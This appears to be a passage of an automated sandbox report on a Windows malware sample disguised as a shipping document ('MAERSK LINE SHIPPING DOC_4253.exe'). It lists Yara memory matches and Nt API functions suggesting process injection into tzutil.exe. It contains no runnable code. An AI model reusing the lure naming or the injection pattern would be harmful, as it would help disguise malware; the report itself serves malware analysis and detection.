                Source: Yara matchFile source: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2537167858.0000000001360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1893908938.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2536674826.0000000000E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2536855237.0000000000E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1894488760.0000000001C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: MAERSK LINE SHIPPING DOC_4253.exe
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0042C953 NtClose,3_2_0042C953
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2B60 NtClose,LdrInitializeThunk,3_2_017E2B60
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_017E2DF0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_017E2C70
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E35C0 NtCreateMutant,LdrInitializeThunk,3_2_017E35C0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E4340 NtSetContextThread,3_2_017E4340
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E4650 NtSuspendThread,3_2_017E4650
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2BF0 NtAllocateVirtualMemory,3_2_017E2BF0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2BE0 NtQueryValueKey,3_2_017E2BE0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2BA0 NtEnumerateValueKey,3_2_017E2BA0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2B80 NtQueryInformationFile,3_2_017E2B80
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2AF0 NtWriteFile,3_2_017E2AF0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2AD0 NtReadFile,3_2_017E2AD0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2AB0 NtWaitForSingleObject,3_2_017E2AB0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2D30 NtUnmapViewOfSection,3_2_017E2D30
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2D10 NtMapViewOfSection,3_2_017E2D10
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2D00 NtSetInformationFile,3_2_017E2D00
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2DD0 NtDelayExecution,3_2_017E2DD0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2DB0 NtEnumerateKey,3_2_017E2DB0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2C60 NtCreateKey,3_2_017E2C60
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2C00 NtQueryInformationProcess,3_2_017E2C00
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2CF0 NtOpenProcess,3_2_017E2CF0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2CC0 NtQueryVirtualMemory,3_2_017E2CC0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2CA0 NtQueryInformationToken,3_2_017E2CA0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2F60 NtCreateProcessEx,3_2_017E2F60
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2F30 NtCreateSection,3_2_017E2F30
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2FE0 NtCreateFile,3_2_017E2FE0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2FB0 NtResumeThread,3_2_017E2FB0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2FA0 NtQuerySection,3_2_017E2FA0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2F90 NtProtectVirtualMemory,3_2_017E2F90
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2E30 NtWriteVirtualMemory,3_2_017E2E30
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2EE0 NtQueueApcThread,3_2_017E2EE0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2EA0 NtAdjustPrivilegesToken,3_2_017E2EA0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2E80 NtReadVirtualMemory,3_2_017E2E80
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E3010 NtOpenDirectoryObject,3_2_017E3010
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E3090 NtSetValueKey,3_2_017E3090
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E39B0 NtGetContextThread,3_2_017E39B0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E3D70 NtOpenThread,3_2_017E3D70
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E3D10 NtOpenProcessToken,3_2_017E3D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03474340 NtSetContextThread,LdrInitializeThunk,6_2_03474340
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03474650 NtSuspendThread,LdrInitializeThunk,6_2_03474650
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034735C0 NtCreateMutant,LdrInitializeThunk,6_2_034735C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472B60 NtClose,LdrInitializeThunk,6_2_03472B60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03472BE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03472BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03472BA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472AD0 NtReadFile,LdrInitializeThunk,6_2_03472AD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472AF0 NtWriteFile,LdrInitializeThunk,6_2_03472AF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034739B0 NtGetContextThread,LdrInitializeThunk,6_2_034739B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472F30 NtCreateSection,LdrInitializeThunk,6_2_03472F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472FE0 NtCreateFile,LdrInitializeThunk,6_2_03472FE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472FB0 NtResumeThread,LdrInitializeThunk,6_2_03472FB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03472EE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03472E80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03472D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03472D30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472DD0 NtDelayExecution,LdrInitializeThunk,6_2_03472DD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03472DF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472C60 NtCreateKey,LdrInitializeThunk,6_2_03472C60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03472C70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03472CA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03473010 NtOpenDirectoryObject,6_2_03473010
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03473090 NtSetValueKey,6_2_03473090
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472B80 NtQueryInformationFile,6_2_03472B80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472AB0 NtWaitForSingleObject,6_2_03472AB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472F60 NtCreateProcessEx,6_2_03472F60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472F90 NtProtectVirtualMemory,6_2_03472F90
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472FA0 NtQuerySection,6_2_03472FA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472E30 NtWriteVirtualMemory,6_2_03472E30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472EA0 NtAdjustPrivilegesToken,6_2_03472EA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03473D70 NtOpenThread,6_2_03473D70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472D00 NtSetInformationFile,6_2_03472D00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03473D10 NtOpenProcessToken,6_2_03473D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472DB0 NtEnumerateKey,6_2_03472DB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472C00 NtQueryInformationProcess,6_2_03472C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472CC0 NtQueryVirtualMemory,6_2_03472CC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472CF0 NtOpenProcess,6_2_03472CF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_00989480 NtCreateFile,6_2_00989480
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_009895F0 NtReadFile,6_2_009895F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_009896E0 NtDeleteFile,6_2_009896E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_00989780 NtClose,6_2_00989780
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_009898E0 NtAllocateVirtualMemory,6_2_009898E0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_031B3E340_2_031B3E34
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_031BE1240_2_031BE124
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_031B6F900_2_031B6F90
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_07FA89650_2_07FA8965
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_07FA55780_2_07FA5578
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_07FA55670_2_07FA5567
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_07FA34900_2_07FA3490
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_07FA4BC80_2_07FA4BC8
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_07FA4BB90_2_07FA4BB9
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_07FA38C80_2_07FA38C8
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_07FA30580_2_07FA3058
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_084A6BA10_2_084A6BA1
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_084A6BB00_2_084A6BB0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_098F61DD0_2_098F61DD
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_098F12400_2_098F1240
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_098F36680_2_098F3668
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_098F6D080_2_098F6D08
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_098F12300_2_098F1230
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_004189C33_2_004189C3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0041021B3_2_0041021B
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_004012203_2_00401220
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_004102233_2_00410223
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_004022DE3_2_004022DE
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_004022E03_2_004022E0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00416BCE3_2_00416BCE
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00416BD33_2_00416BD3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_004104433_2_00410443
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0040E4633_2_0040E463
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0040E5B33_2_0040E5B3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0040262C3_2_0040262C
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_004026303_2_00402630
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00402F503_2_00402F50
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0042EF233_2_0042EF23
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018641A23_2_018641A2
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018701AA3_2_018701AA
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018681CC3_2_018681CC
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A01003_2_017A0100
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184A1183_2_0184A118
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018381583_2_01838158
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018420003_2_01842000
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018703E63_2_018703E6
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017BE3F03_2_017BE3F0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186A3523_2_0186A352
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018302C03_2_018302C0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018502743_2_01850274
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018705913_2_01870591
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B05353_2_017B0535
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0185E4F63_2_0185E4F6
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018544203_2_01854420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018624463_2_01862446
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B07703_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D47503_2_017D4750
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AC7C03_2_017AC7C0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CC6E03_2_017CC6E0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C69623_2_017C6962
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0187A9A63_2_0187A9A6
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A03_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017BA8403_2_017BA840
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B28403_2_017B2840
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE8F03_2_017DE8F0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017968B83_2_017968B8
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01866BD73_2_01866BD7
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186AB403_2_0186AB40
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AEA803_2_017AEA80
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017BAD003_2_017BAD00
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AADE03_2_017AADE0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184CD1F3_2_0184CD1F
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C8DBF3_2_017C8DBF
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01850CB53_2_01850CB5
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0C003_2_017B0C00
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A0CF23_2_017A0CF2
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182EFA03_2_0182EFA0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D0F303_2_017D0F30
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017F2F283_2_017F2F28
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017BCFE03_2_017BCFE0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A2FC83_2_017A2FC8
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01852F303_2_01852F30
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01824F403_2_01824F40
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186CE933_2_0186CE93
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0E593_2_017B0E59
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186EEDB3_2_0186EEDB
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186EE263_2_0186EE26
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C2E903_2_017C2E90
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179F1723_2_0179F172
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E516C3_2_017E516C
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017BB1B03_2_017BB1B0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0187B16B3_2_0187B16B
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0185F0CC3_2_0185F0CC
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186F0E03_2_0186F0E0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018670E93_2_018670E9
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B70C03_2_017B70C0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179D34C3_2_0179D34C
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186132D3_2_0186132D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017F739A3_2_017F739A
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018512ED3_2_018512ED
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CB2C03_2_017CB2C0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B52A03_2_017B52A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184D5B03_2_0184D5B0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018795C33_2_018795C3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018675713_2_01867571
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A14603_2_017A1460
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186F43F3_2_0186F43F
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186F7B03_2_0186F7B0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018616CC3_2_018616CC
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017F56303_2_017F5630
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B99503_2_017B9950
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CB9503_2_017CB950
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018459103_2_01845910
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181D8003_2_0181D800
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B38E03_2_017B38E0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01825BF03_2_01825BF0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017EDBF93_2_017EDBF9
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186FB763_2_0186FB76
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CFB803_2_017CFB80
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01851AA33_2_01851AA3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184DAAC3_2_0184DAAC
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0185DAC63_2_0185DAC6
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01867A463_2_01867A46
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186FA493_2_0186FA49
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017F5AA03_2_017F5AA0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01823A6C3_2_01823A6C
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B3D403_2_017B3D40
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CFDC03_2_017CFDC0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01861D5A3_2_01861D5A
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01867D733_2_01867D73
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186FCF23_2_0186FCF2
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01829C323_2_01829C32
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186FFB13_2_0186FFB1
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186FF093_2_0186FF09
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01773FD53_2_01773FD5
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01773FD23_2_01773FD2
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B1F923_2_017B1F92
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B9EB03_2_017B9EB0
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_025072CD5_2_025072CD
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_025072CE5_2_025072CE
